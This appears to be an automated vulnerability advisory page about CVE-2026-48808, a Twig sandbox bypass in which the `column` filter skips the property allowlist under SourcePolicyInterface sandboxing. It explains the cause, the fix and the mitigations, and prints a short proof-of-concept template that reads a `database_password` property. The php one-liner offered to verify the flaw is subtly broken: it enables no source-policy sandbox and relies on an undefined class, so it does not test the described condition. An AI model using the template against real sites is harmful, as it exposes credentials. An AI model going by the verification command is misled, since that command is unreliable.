Twig (PHP templating engine), Sandbox Property Allowlist Bypass via SourcePolicyInterface, CVE-2026-48808 (Medium) -DC-Jun2026-755

Listen to this Post

How CVE-2026-48808 Works

CVE-2026-48808 is a residual bypass of the earlier CVE-2026-46635 / GHSA-vcc8-phrv-43wj. Unlike the original CVE, this specific flaw only affects sandboxing enabled through SourcePolicyInterface, not the regular global sandbox mode.
The vulnerability exists in the `CoreExtension::column()` method. This method receives the active sandbox state via the `needs_is_sandboxed` channel as a boolean $isSandboxed. However, when routing per-element property reads, it passes the request through `SandboxExtension::checkPropertyAllowed()` without forwarding the current Source.
Internally, `SandboxExtension::checkPropertyAllowed()` re-evaluates isSandboxed($source). Because `$source` is null, the decision made by the `SourcePolicyInterface` is lost, and the method short-circuits to a “not sandboxed” state. As a result, the property allowlist (SecurityPolicy::$allowedProperties) is never consulted.
A template author whose sandbox is gated by a `SourcePolicyInterface` and who has `column` in their `allowedFilters` list can therefore read any public or magic property of any object reachable in the render context. This occurs regardless of SecurityPolicy::$allowedProperties.
Direct attribute access to the same property would be blocked, and the same payload is also blocked under global sandbox mode. This makes it a clear policy enforcement gap rather than a configuration issue.
The fix, implemented in Twig versions 3.14.2 and 3.16.0, ensures that `CoreExtension::column()` no longer goes through the `SandboxExtension` wrapper for the property check. It calls the security policy directly; the per-source decision is already captured by the `$isSandboxed` boolean computed at the call site. This enforces the property allowlist consistently for both global and source-policy sandboxing.

DailyCVE Form:

Platform: Twig (PHP)
Version: <3.14.2, <3.16.0
Vulnerability : Sandbox property allowlist bypass
Severity: Medium
date: 2026-05-27

Prediction: 2026-05-27

What Undercode Say:

Check Twig Version

composer show twig/twig | grep versions

Verify Vulnerability (Test with a Sandbox Policy that blocks all properties)

php -r "require 'vendor/autoload.php'; \$twig = new Twig\Environment(new Twig\Loader\ArrayLoader(['test' => '{{ users|column(\"database_password\") }}'])); \$twig->addExtension(new Twig\Extension\SandboxExtension(new Twig\Sandbox\SecurityPolicy([], [], [], [], []))); echo \$twig->render('test', ['users' => [new User()]]);"

This command attempts to read the `database_password` property using a sandbox policy that would normally block access to all properties.

Vulnerable Template Example (Sandbox enabled)

{% set objects = [user, admin] %}
{% set leaked = objects|column('database_password') %}

This template uses the `column` filter to read the `database_password` property from an array of objects, bypassing the sandbox’s property allowlist.

Exploit:

An attacker who can control or influence a Twig template, and whose sandbox is enabled via SourcePolicyInterface, can leverage the `column` filter to read sensitive information. Because the `Source` is not forwarded during the property check, the sandbox incorrectly treats the context as “not sandboxed”. This allows the attacker to read any public or magic property of any object in the render context, regardless of the `SecurityPolicy::$allowedProperties` list.

Protection:

  • Upgrade Twig to version 3.14.2 or 3.16.0 or later.
  • If upgrading is not immediately possible, avoid using `SourcePolicyInterface` for sandboxing until the patch can be applied.
  • Ensure that `column` is not in the `allowedFilters` list for any sandboxed environment where `SourcePolicyInterface` is used.
  • Apply the official patch provided by the Twig team, which modifies `CoreExtension::column()` to call the security policy directly, using the pre-computed `$isSandboxed` boolean.

Impact:

  • Information Disclosure: An attacker can read sensitive data from objects in the render context, such as database credentials, API keys, internal configuration values, or any other property exposed through public getters or magic methods (__get, __isset).
  • Bypass of Security Controls: The `SecurityPolicy::$allowedProperties` list is completely ignored, rendering the primary sandboxing mechanism for property access ineffective.
  • Limited Scope: This vulnerability only affects environments using `SourcePolicyInterface` for sandboxing. Global sandbox mode and direct attribute access are not vulnerable to this specific bypass.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top